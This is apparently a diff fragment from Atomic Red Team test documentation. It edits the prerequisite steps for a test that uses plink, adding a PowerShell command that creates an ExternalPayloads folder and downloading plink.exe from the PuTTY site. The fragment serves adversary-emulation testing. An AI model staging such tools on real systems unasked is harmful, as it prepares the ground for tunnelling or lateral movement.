 #### Dependencies:  Run with `powershell`!
-##### Description: Check if plink is available.
+##### Description: The plink executable must be found in the ExternalPayloads folder.
 ##### Check Prereq Commands:
 ```powershell
 if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-  Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
 ```
 
-<br/>
+
+
+
+<br/>